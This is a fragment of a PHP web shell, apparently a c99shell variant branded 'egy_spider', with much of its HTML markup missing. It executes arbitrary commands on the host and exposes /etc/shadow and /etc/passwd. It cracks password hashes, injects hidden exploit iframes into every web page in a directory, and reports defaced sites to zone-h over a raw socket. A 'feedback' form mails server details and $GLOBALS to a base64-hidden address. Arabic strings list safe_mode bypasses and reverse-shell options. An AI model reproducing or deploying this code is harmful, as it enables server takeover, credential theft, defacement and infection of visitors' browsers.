";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +error_reporting(0); +set_magic_quotes_runtime(0); + + +if(version_compare(phpversion(), '4.1.0') == -1) + {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"]; +if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);} +elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;} +else{return $requ."?".$link."=".$val;}} +function delm($delmtxt){print"
";print"
$delmtxt
";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> +";$ef=""; +$st=""; +$et="
";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + + +print"";print"";print"
"; print"
+
"; print"
";print "
"; +print"";print"";print"
"; print"
";print ""; + + +if ($act == 'encoder') +{ + echo "
Encoder:
Input:




Hashes:
"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
"; + } + echo "
Url:

urlencode - +
urldecode - +
Base64:
base64_encode -
"; + echo "
base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

Base convertations:
dec2hex -
"; + + +?> +
+

+ + + +
+
Search milw0rm for MD5 hash
+
+
Search md5encryption.com for MD5 or SHA1 hash
+
+
Search CsTeam for MD5 hash
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+'; + if ($hash == $type(rtrim($word))) { + echo 'Great success! The password is: '.$word.'
'; + exit; + } + ++$count; + } +} + + +} +if ($act == 'fsbuff') +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
Buffer is empty!
";} + else {echo "File-System buffer

"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
Can't delete ".__FILE__."!
";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
Self-remove: ".__FILE__."
Are you sure?
For confirmation, enter \"".$rnd."\"
 "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ=="); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "egy_spider v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"egy_spider v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
Thanks for your feedback! Your ticket ID: ".$ticket.".
"; + } + else {echo "
Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

Your name:

Your e-mail:

Message:


Attach server-info *

There are no checking in the form.

If you want to send a request for any help I know I will respond to you in case

* - strongly recommended, if you report bug, because we need it for bug-fix.

We understand languages: Arbic, English.

";} +} + + +if ($act == 'massbrowsersploit') { +?> +Mass Code Injection:

+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

+
+ + + + + + +
Dir to inject: <-- default is dir this shell is in
Code to inject: <-- best bet would be to include an invisible iframe of browser exploits
+
+'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + } else { //end if inputted dir is real -- if not, show an ugly red error + echo ''.$_GET['pathtomass'].' is not available!'; + } // end if inputted dir is real, for real this time +} // end if confirmation to mass sploit is go +} // end if massbrowsersploit is called + + + + + + +if ($dlink=='showsrc'){ +print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; +input ("text","tools&dlink=showsrc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","tools&dlink=showsrc","Show-src","");print $ef; die();}if(isset($_REQUEST['tools&dlink=showsrc'])){callshsrc(trim($_REQUEST['showsc']));} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Edit again +] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
";print "

"; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
"; print"
";print "
"; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"OFF ( Not secured )";} else{ +print"ON ( Secured )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; echo "
[ BACK ]
"; die(); } + + + + + if(isset($_GET['egy'])) + { + echo $head; + echo '
EgY SpIdEr
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
+ +

 

+

+ +

+

 

+
+  
+

 

+
'; + echo "
[ BACK ]
"; + die(); + } + if(isset($_GET['news'])) + { + echo $head; + echo '
EgY SpIdEr
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
+ +

 

+

+ +

+

 

+
+  
+

 

+
'; + echo "
[ BACK ]
";
+ die();
+ }
+
+
+
+
+if(isset($_GET['5']))
+ {$_POST['cmd'] = 'systeminfo';}
+if(isset($_GET['6']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
+if(isset($_GET['7']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
+if(isset($_GET['8']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
+if(isset($_GET['9']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
+if(isset($_GET['10']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
+if(isset($_GET['13']))
+ {$_POST['cmd']='cat /proc/cpuinfo';}
+if(isset($_GET['14']))
+ {$_POST['cmd']='cat /proc/version';}
+if(isset($_GET['15']))
+ {$_POST['cmd'] = 'free';}
+if(isset($_GET['16']))
+ {$_POST['cmd'] = 'dmesg(8)';}
+if(isset($_GET['17']))
+ {$_POST['cmd'] = 'vmstat';}
+if(isset($_GET['18']))
+ {$_POST['cmd'] = 'lspci';}
+if(isset($_GET['19']))
+ {$_POST['cmd'] = 'lsdev';}
+if(isset($_GET['20']))
+ {$_POST['cmd']='cat /proc/interrupts';}
+if(isset($_GET['21']))
+ {$_POST['cmd'] = 'cat /etc/*realise';}
+if(isset($_GET['22']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
+if(isset($_GET['23']))
+ {$_POST['cmd'] = 'lsattr -va';}
+if(isset($_GET['24']))
+ {$_POST['cmd'] = 'w';}
+if(isset($_GET['25']))
+ {$_POST['cmd'] = 'who';}
+if(isset($_GET['26']))
+ {$_POST['cmd'] = 'uptime';}
+if(isset($_GET['27']))
+ {$_POST['cmd'] = 'last -n 10';}
+if(isset($_GET['28']))
+ {$_POST['cmd'] = 'ps -aux';}
+if(isset($_GET['29']))
+ {$_POST['cmd'] = 'service --status-all';}
+if(isset($_GET['30']))
+ {$_POST['cmd'] = 'ifconfig';}
+if(isset($_GET['31']))
+ {$_POST['cmd'] = 'netstat -a';}
+if(isset($_GET['32']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
+if(isset($_GET['33']))
+ {$_POST['cmd'] = 'fdisk -l';}
+if(isset($_GET['34']))
+ {$_POST['cmd'] = 'df -h';}
+
+
+#if(isset($_GET['']))
+# {$_POST['cmd'] = '';}
+
+
+$lang=array(
+'ar_text1' =>'ÇáÇãÑ ÇáãäÝÐ',
+'ar_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ',
+'ar_text3' 
=>'ÇãÑ ÇáÊÔÛíá', +'ar_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ', +'ar_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ', +'ar_text6' =>'ãÓÇÑ ãáÝß', +'ar_text7' =>'ÇæÇãÑ ÌÇåÒå', +'ar_text8' =>'ÇÎÊÑ ÇáÇãÑ', +'ar_butt1' =>'ÊäÝíÐ', +'ar_butt2' =>'ÑÝÜÚ', +'ar_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash', +'ar_text10'=>'ÈÜæÑÊ', +'ar_text11'=>'ÈÇÓæÑÏ ááÏÎæá', +'ar_butt3' =>'ÝÊÍ', +'ar_text12'=>'ÃÊÕÜÇá ÚÜßÓí', +'ar_text13'=>'ÇáÇí Èí', +'ar_text14'=>'ÇáãäÝÐ', +'ar_butt4' =>'ÃÊÜÕÇá', +'ar_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ', +'ar_text16'=>'Úä ØÑíÞ', +'ar_text17'=>'ÑÇÈØ ÇáãáÝ', +'ar_text18'=>'ãßÇä äÒæáå', +'ar_text19'=>'Exploits', +'ar_text20'=>'ÅÓÊÎÏã', +'ar_text21'=>'ÇáÇÓã ÇáÌÏíÏ', +'ar_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ', +'ar_text23'=>'ÇáÈæÑÊ ÇáãÍáí', +'ar_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ', +'ar_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ', +'ar_text26'=>'ÇÓÊÎÏã', +'ar_butt5' =>'ÊÔÛíá', +'ar_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä', +'ar_text29'=>'ããäæÚ ÇáÏÎæá', +'ar_butt6' =>'ÊÛíÑ', +'ar_text30'=>'ÚÑÖ ãáÝ', +'ar_butt7' =>'ÚÑÖ', +'ar_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ', +'ar_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval', +'ar_text33'=>'Test bypass open_basedir with cURL functions', +'ar_butt8' =>'ÇÎÊÈÇÑ', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå include', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå Mysql', +'ar_text36'=>'ÇáÞÇÚÏÉ . 
ÇáÌÏæá', +'ar_text37'=>'ÇÓã ÇáãÓÊÎÏã', +'ar_text38'=>'ßáãÉ ÇáãÑæÑ', +'ar_text39'=>'ÇáÞÇÚÏÉ', +'ar_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ', +'ar_butt9' =>'äÓÎÉ', +'ar_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí', +'ar_text42'=>'ÊÚÏíá ÇáãáÝÇÊ', +'ar_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå', +'ar_butt10'=>'ÍÝÙ', +'ar_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ', +'ar_text45'=>'Êã ÇáÍÝÙ', +'ar_text46'=>'ÚÑÖ phpinfo()', +'ar_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini', +'ar_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp', +'ar_butt11'=>'ÊÍÑíÑ ÇáãáÝ', +'ar_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ', +'ar_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ', +'ar_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ', +'ar_text52'=>'ÈÍË äÕ', +'ar_text53'=>'Ýí ÇáãÓÇÑ', +'ar_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ', +'ar_butt12'=>'ÈÍË', +'ar_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ', +'ar_text56'=>'áÇíæÌÏ :(', +'ar_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ', +'ar_text58'=>'ÇáÇÓã', +'ar_text59'=>'ãáÝ', +'ar_text60'=>'ãÌáÏ', +'ar_butt13'=>'ÅäÔÇÁ /ãÓÍ', +'ar_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ', +'ar_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ', +'ar_text63'=>'Êã ãÓÍ ÇáãáÝ', +'ar_text64'=>'Êã ãÓÍ ÇáãÌáÏ', +'ar_butt65'=>'ÅäÔÇÁ', +'ar_text66'=>'ãÓÍ', +'ar_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ', +'ar_text68'=>'ÇãÑ', +'ar_text69'=>'ÅÓã ÇáãáÝ', +'ar_text70'=>'ÇáÊÕÑíÍ', +'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'ar_text72'=>'ÇáäÕ ÇáãÑÇÏ', +'ar_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ', +'ar_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ', +'ar_text75'=>'* you can use regexp', +'ar_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find', +'ar_text80'=>'ÇáäæÚ', +'ar_text81'=>'ÇáÅÊÕÇáÇÊ', +'ar_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ', +'ar_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã', +'ar_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ', +'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'ar_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ', +'ar_butt14'=>'ÊÍãíá', +'ar_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí', +'ar_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ', +'ar_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí', +'ar_text90'=>'ÇáÊÍæíá Çáì', 
+'ar_text91'=>'ÇÑÔÝÉ', +'ar_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ', +'ar_text93'=>'ÇáÇÝ Êí Èí', +'ar_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí', +'ar_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä', +'ar_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä', +'ar_text97'=>'Êã ÇáÝÍÕ: ', +'ar_text98'=>'Êã ÈäÌÇÍ: ', +'ar_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp', +'ar_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí', +'ar_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ', +'ar_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ', +'ar_text103'=>'ÇÑÓÇá ÈÑíÏ', +'ar_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá', +'ar_text105'=>'Åáì', +'ar_text106'=>'ãÜä', +'ar_text107'=>'ÇáãæÖæÚ', +'ar_butt15'=>'ÅÑÓÇá', +'ar_text108'=>'ÇáÑÓÇáÉ', +'ar_text109'=>'ãÎÝí', +'ar_text110'=>'ÚÑÖ', +'ar_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ', +'ar_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail', +'ar_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list', +'ar_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body', +'ar_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://', +'ar_text116'=>'äÓÎ ãä', +'ar_text117'=>'Çáì', +'ar_text118'=>'Êã äÓÎ ÇáãáÝ', +'ar_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ', +'ar_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ', +'ar_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ', +'ar_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ', +'ar_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí', +'ar_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí', +'ar_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí', +'ar_err6'=>'ÎØÇÁ ! 
áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå', +'ar_err7'=>'ÇáÈÑíÏ ÇÑÓá', +'ar_text200'=>'copy()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå', +'ar_text300'=>'curl()ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text203'=>'ini_restore()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text204'=>'error_log()ÒÑÇÚå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå', +'ar_text205'=>'ÃÒÑÚ ÇáÔá Úáì åÐÇ ÇáãÓÇÑ', +'ar_text206'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏ', +'ar_text207'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå reg_glob', +'ar_text208'=>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáæÖÚ ÇáÇãä Úä ØÑíÞ ÇáÏæÇá', +'ar_text209'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå root', +'ar_text210'=>'Ýß ÊÔÝíÑ ÇáÒäÏ ', +'ar_text211'=>'::ÇÞÝÇá ÇáÓíÝ ãæÏ::', +'ar_text212'=>'php.ini ÇÞÝÇá ÇáÓíÝ ãæÏ Úä ØÑíÞ ÒÑÚ ãáÝ', +'ar_text213'=>'htacces ÅÞÝÇá ÇáãæÏ ÓßíæÑÊí Úä ØÑíÞ ÒÑÚ ãáÝ', +'ar_text214'=>'ÃÓã ÇáÇÏãä', +'ar_text215'=>'ÚäæÇä ÇáÓíÑÝÑ IRC ', +'ar_text216'=>'# ÃÓã ÇáÛÑÝå ãÚ', +'ar_text217'=>'ÇÓã ÇáÓíÑÝÑ ÇáãÎÊÑÞ', +'ar_text218'=>'áÅíÞÇÝ ÇáÓíÝ ãæÏ ini_restore ÒÑÚ ãáÝ íÍÊæí Úáì ËÛÑå', +'ar_text219'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ æÊÛíÑ ÇÓãåÇ ÈÇáæÖÚ ÇáÇãä', +'ar_text220'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáÇæáì', +'ar_text221'=>'ÖÛØ ÇáãáÝÇÊ áÊÍãíáåÇ ãä ÇáãæÞÚ(ÈÚÏ ÊÍãíáåÇ áÌåÇÒß ÛíÑ ÇãÊÏÇÏ ÇáãáÝ áÇãÊÏÇÏå ÇáÓÇÈÞ)1', +'ar_text222'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáËÇäíå', +'ar_text223'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ÇáÏæÇá', +'ar_text224'=>'PLUGIN ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå ', +'ar_text143'=>'ÇáÊãÈ: ', +'ar_text65'=>'ÇäÔÇÁ', + + + + +'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql', +'ar_text85'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ commands execute via MSSQL server', +'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 
